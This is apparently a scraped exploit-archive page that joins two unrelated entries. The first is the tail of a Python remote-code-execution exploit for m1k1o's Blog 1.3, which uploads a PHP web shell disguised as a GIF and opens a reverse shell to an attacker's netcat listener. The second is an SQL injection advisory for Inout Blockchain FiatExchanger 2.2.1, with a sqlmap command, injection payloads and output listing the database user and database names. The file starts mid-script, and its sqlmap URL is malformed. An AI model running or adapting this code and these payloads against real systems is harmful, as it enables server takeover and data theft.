name="file"; filename="malicious.gif.php"Content-Type: application/x-httpd-phpGIF<?php system(base64_decode('{b64encode(bytes(command, 'utf-8')).decode('ascii')}')); ?>;-----------------------------13148889121752486353560141292--"""def send_payload():    payload_header = {        "Host": f"{address}",        "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292",        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",        "X-Requested-With": "XMLHttpRequest",        "Csrf-Token": f"{csrf_token}",        "Cookie": f"PHPSESSID={blog_cookie}"    }    upload_url = f"http://{address}:{port}/ajax.php?action=upload_image"    command = f"php -r '$sock=fsockopen(\"{lhost_ip}\",{lhost_port});exec(\"/bin/bash <&3 >&3 2>&3\");'"    payload = generate_payload(command)    print(f"[+] Upload exploit")    result = req.post(url=upload_url, headers=payload_header, data=payload, proxies= {"http": "http://127.0.0.1:8080"})    set_exploit_file_name(result.content.decode('ascii'))def set_exploit_file_name(data):    global exploit_file_name    file_regex = r"[a-zA-Z0-9]{4,5}.php"    exploit_file_name = re.search(file_regex, data).group(0)def call_malicious_php(file_name):    global header    complete_url = f"{url}/data/i/{file_name}"    print('[*] Calling reverse shell')    result = req.get(url=complete_url)def check_reverse_shell():    yes = {'yes', 'y', 'ye', ''}    no = {'no', 'n'}    choice = input("Have you got an active netcat listener (y/Y or n/N): ")    if choice in yes:        return True    elif choice in no:        print(f"[!] Please open netcat listener with \"nc -lnvp {lhost_port}\"")        return Falsedef main():    enabled_listener = check_reverse_shell()    if enabled_listener:        login(username, password)        send_payload()        call_malicious_php(exploit_file_name)if __name__ == "__main__":    main()

m1k1o's Blog 1.3 Remote Code Execution

Blockchain FiatExchanger version 2.2.1 suffers from a remote blind SQL injection vulnerability.

# Information  
```  
Vulnerability Name  : Remote Blind SQL Injections in Inout Blockchain FiatExchanger  
Product             : Inout Blockchain FiatExchanger  
version             : 2.2.1  
Date                : 2022-05-21  
Vendor Site         : https://www.inoutscripts.com/products/inout-blockchain-fiatexchanger/  
Exploit Detail      : https://github.com/bigb0x/CVEs/blob/main/Inout-Blockchain-FiatExchanger-221-sqli.md  
CVE-Number          : In Progess  
Exploit Author      : Mohamed N. Ali @MohamedNab1l  
```  
<br>

# Description  
<br>

SQL injection attack has been discovered in Blockchain FiatExchanger v2.2.1 platform. This will allow remote non-authenticated attackers to inject SQL code. This could result in full information disclosure.  
<br>

## Vulnerable Parameter: symbol (GET)

<br>

Vulnerability File: /application/third_party/Chart/TradingView/chart_content/master.php line 130

<br>

### Sqlmap command:  
`  
python sqlmap.py -u "http://http://vulnerable-host.com/application/third_party/Chart/TradingView/chart_content/master.php/history?from=1652675947&resolution=5&symbol=BTC-BCH" -p symbol --dbms=MySQL --banner --random-agent --current-db --dbs --current-user

`  
<br>

### output:  
`  
[20:05:54] [INFO] fetched random HTTP User-Agent header value 'Opera/9.20(Windows NT 5.1; U; en)' from file '/root/sqlmap/data/txt/user-agents.txt'  
[20:05:55] [INFO] testing connection to the target URL  
[20:05:55] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests  
sqlmap resumed the following injection point(s) from stored session:

Parameter: symbol (GET)  
    Type: error-based  
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
    Payload: from=1652675947&resolution=5&symbol=BTC-BCH' AND (SELECT 1746 FROM(SELECT COUNT(*),CONCAT(0x71707a6b71,(SELECT (ELT(1746=1746,1))),0x7171627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'hIKU'='hIKU

    Type: time-based blind  
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
    Payload: from=1652675947&resolution=5&symbol=BTC-BCH' AND (SELECT 4566 FROM (SELECT(SLEEP(5)))kVcR) AND 'JGrB'='JGrB

[20:05:55] [INFO] testing MySQL  
[20:05:56] [INFO] confirming MySQL  
[20:05:57] [INFO] the back-end DBMS is MySQL  
[20:05:57] [INFO] fetching banner  
[20:05:57] [INFO] resumed: '5.6.50'  
web application technology: PHP 7.0.33  
back-end DBMS: MySQL >= 5.0.0  
banner: '5.6.50'  
[20:05:57] [INFO] fetching current user  
[20:05:57] [INFO] retrieved: 'root@localhost'  
current user: 'root@localhost'  
[20:05:57] [INFO] fetching current database  
[20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_db'  
current database: 'inout_blockchain_fiatexchanger_db'  
[20:05:57] [INFO] fetching database names  
[20:05:57] [INFO] resumed: 'information_schema'  
[20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_addons_db'  
[20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_cryptotrading_db'  
[20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_db'  
[20:05:57] [INFO] resumed: 'mysql'  
[20:05:57] [INFO] resumed: 'performance_schema'  
available databases [6]:  
[*] information_schema  
[*] inout_blockchain_fiatexchanger_addons_db  
[*] inout_blockchain_fiatexchanger_cryptotrading_db  
[*] inout_blockchain_fiatexchanger_db  
[*] mysql  
[*] performance_schema

`  
<br>  
<img src="./resources/Blockchain-FiatExchanger-221-sqlmap1.png">  
<br>  
<img src="./resources/Blockchain-FiatExchanger-221-sqlmap2.png">  
<br>

## Timeline  
```  
2022-05-03: Discovered the bug  
2022-05-03: Reported to vendor  
2022-05-21: Advisory published  
```

<br>

## Discovered by  
```  
Mohamed N. Ali  
@MohamedNab1l  
ali.mohamed@gmail.com

```

Tag

#php